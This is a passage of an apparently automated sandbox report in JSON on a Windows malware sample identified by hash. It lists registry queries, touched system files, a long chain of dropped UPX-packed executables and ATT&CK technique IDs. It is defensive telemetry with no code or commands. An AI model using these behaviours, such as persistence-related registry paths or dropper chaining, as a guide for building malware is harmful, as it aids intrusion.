\"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2680282.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hnvpxj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hrrnrd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xxjrxn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"btpbndn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lbjvvjh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pdvxbf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"txbxjp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"frdfrrr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"464448.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jlrnp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tbxfnh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fptjxhr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ffjhjxx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"84624.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4682600.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2040668.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"686200.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"026288.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2420222.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6088244.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"826268.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"phdjp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ldpfr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"c:\\2680282.exe\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2680282.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hnvpxj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hrrnrd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xxjrxn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"btpbndn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lbjvvjh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pdvxbf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"txbxjp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"frdfrrr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"464448.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jlrnp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"tbxfnh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" writes file \"c:\\2680282.exe\"\n \"2680282.exe\" writes file \"c:\\hnvpxj.exe\"\n \"hnvpxj.exe\" writes file \"c:\\hrrnrd.exe\"\n \"hrrnrd.exe\" writes file \"c:\\xxjrxn.exe\"\n \"xxjrxn.exe\" writes file \"c:\\btpbndn.exe\"\n \"btpbndn.exe\" writes file \"c:\\lbjvvjh.exe\"\n \"lbjvvjh.exe\" writes file \"c:\\pdvxbf.exe\"\n \"pdvxbf.exe\" writes file \"c:\\txbxjp.exe\"\n \"txbxjp.exe\" writes file \"c:\\frdfrrr.exe\"\n \"frdfrrr.exe\" writes file \"c:\\464448.exe\"\n \"464448.exe\" writes file \"c:\\jlrnp.exe\"\n \"jlrnp.exe\" writes file \"c:\\tbxfnh.exe\"\n \"tbxfnh.exe\" writes file \"c:\\fptjxhr.exe\"\n \"fptjxhr.exe\" writes file \"c:\\ffjhjxx.exe\"\n \"ffjhjxx.exe\" writes file \"c:\\84624.exe\"\n \"84624.exe\" writes file \"c:\\4682600.exe\"\n \"4682600.exe\" writes file \"c:\\2040668.exe\"\n \"2040668.exe\" writes file \"c:\\686200.exe\"\n \"686200.exe\" writes file \"c:\\026288.exe\"\n \"026288.exe\" writes file \"c:\\2420222.exe\"\n \"2420222.exe\" writes file \"c:\\6088244.exe\"\n \"6088244.exe\" writes file \"c:\\826268.exe\"\n \"826268.exe\" writes file \"c:\\phdjp.exe\"\n \"phdjp.exe\" writes file \"c:\\ldpfr.exe\"\n \"ldpfr.exe\" writes file \"c:\\dtlrb.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"jvhfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"042468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2626426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8428466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"npxxxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pffjpht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjxrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"trnnjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ttfvnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"240606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6402288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bttfvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hnjnfnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjfjrfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfhhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6804604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6804604.exe]- [targetUID: 00000000-00004324]\n \"42828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42828.exe]- [targetUID: 00000000-00003296]\n \"068420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068420.exe]- [targetUID: 00000000-00002524]\n \"4640804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640804.exe]- [targetUID: 00000000-00002524]\n \"866846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\866846.exe]- [targetUID: 00000000-00003528]\n \"22840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22840.exe]- [targetUID: 00000000-00004588]\n \"24642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24642.exe]- [targetUID: 00000000-00001768]\n \"240802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240802.exe]- [targetUID: 00000000-00001768]\n \"tbnhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbnhh.exe]- [targetUID: 00000000-00001448]\n \"xbnxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbnxx.exe]- [targetUID: 00000000-00003864]\n \"xdhlrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdhlrl.exe]- [targetUID: 00000000-00003864]\n \"jpflb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jpflb.exe]- [targetUID: 00000000-00003976]\n \"02242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02242.exe]- [targetUID: 00000000-00000568]\n \"626200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626200.exe]- [targetUID: 00000000-00000568]\n \"bjdjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjdjr.exe]- [targetUID: 00000000-00003944]\n \"fnjvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnjvr.exe]- [targetUID: 00000000-00003944]\n \"nffhjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nffhjx.exe]- [targetUID: 00000000-00000596]\n \"064826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\064826.exe]- [targetUID: 00000000-00001076]\n \"2246640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2246640.exe]- [targetUID: 00000000-00001076]\n \"8682642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8682642.exe]- [targetUID: 00000000-00004520]\n \"6046286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6046286.exe]- [targetUID: 00000000-00004520]\n \"44266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44266.exe]- [targetUID: 00000000-00003580]\n \"pjjdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pjjdj.exe]- [targetUID: 00000000-00003580]\n \"nrjljrp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrjljrp.exe]- [targetUID: 00000000-00003180]\n \"fxrlrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxrlrh.exe]- [targetUID: 00000000-00003180]\n \"rflrbrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rflrbrt.exe]- [targetUID: 00000000-00003188]\n \"bnrhnlj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnrhnlj.exe]- [targetUID: 00000000-00003452]\n \"tlxll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlxll.exe]- [targetUID: 00000000-00004172]\n \"pdhfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhfl.exe]- [targetUID: 00000000-00004172]\n \"pjjvtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pjjvtd.exe]- [targetUID: 00000000-00004292]\n \"flrpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flrpd.exe]- [targetUID: 00000000-00004292]\n \"08684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08684.exe]- [targetUID: 00000000-00002516]\n \"2084042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2084042.exe]- [targetUID: 00000000-00003768]\n \"208666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\208666.exe]- [targetUID: 00000000-00003768]\n \"46420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46420.exe]- [targetUID: 00000000-00001460]\n \"4804042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4804042.exe]- [targetUID: 00000000-00001460]\n \"djlfb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djlfb.exe]- [targetUID: 00000000-00003900]\n \"nvphdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvphdb.exe]- [targetUID: 00000000-00003900]\n \"jrfndd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrfndd.exe]- [targetUID: 00000000-00002136]\n \"dtlrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtlrb.exe]- [targetUID: 00000000-00002564]\n \"ldpfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpfr.exe]- [targetUID: 00000000-00004040]\n \"phdjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phdjp.exe]- [targetUID: 00000000-00004040]\n \"826268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\826268.exe]- [targetUID: 00000000-00002648]\n \"6088244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6088244.exe]- [targetUID: 00000000-00001696]\n \"2420222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2420222.exe]- [targetUID: 00000000-00001416]\n \"026288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026288.exe]- [targetUID: 00000000-00002528]\n \"686200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\686200.exe]- [targetUID: 00000000-00002528]\n \"2040668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2040668.exe]- [targetUID: 00000000-00004448]\n \"4682600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4682600.exe]- [targetUID: 00000000-00003724]\n \"84624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84624.exe]- [targetUID: 00000000-00003724]\n \"ffjhjxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffjhjxx.exe]- [targetUID: 00000000-00006016]\n \"fptjxhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fptjxhr.exe]- [targetUID: 00000000-00004124]\n \"tbxfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbxfnh.exe]- [targetUID: 00000000-00004124]\n \"jlrnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jlrnp.exe]- [targetUID: 00000000-00003568]\n \"464448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464448.exe]- [targetUID: 00000000-00003568]\n \"frdfrrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frdfrrr.exe]- [targetUID: 00000000-00004372]\n \"txbxjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txbxjp.exe]- [targetUID: 00000000-00004372]\n \"pdvxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdvxbf.exe]- [targetUID: 00000000-00006080]\n \"lbjvvjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbjvvjh.exe]- [targetUID: 00000000-00006128]\n \"btpbndn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btpbndn.exe]- [targetUID: 00000000-00004380]\n \"xxjrxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xxjrxn.exe]- [targetUID: 00000000-00004380]\n \"hrrnrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrnrd.exe]- [targetUID: 00000000-00006032]\n \"hnvpxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnvpxj.exe]- [targetUID: 00000000-00003556]\n \"2680282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2680282.exe]- [targetUID: 00000000-00003556]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"3D8AF879BBBDE5E9F5598715C576BF33FADEEAE034114384893DF9C534F86084\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: 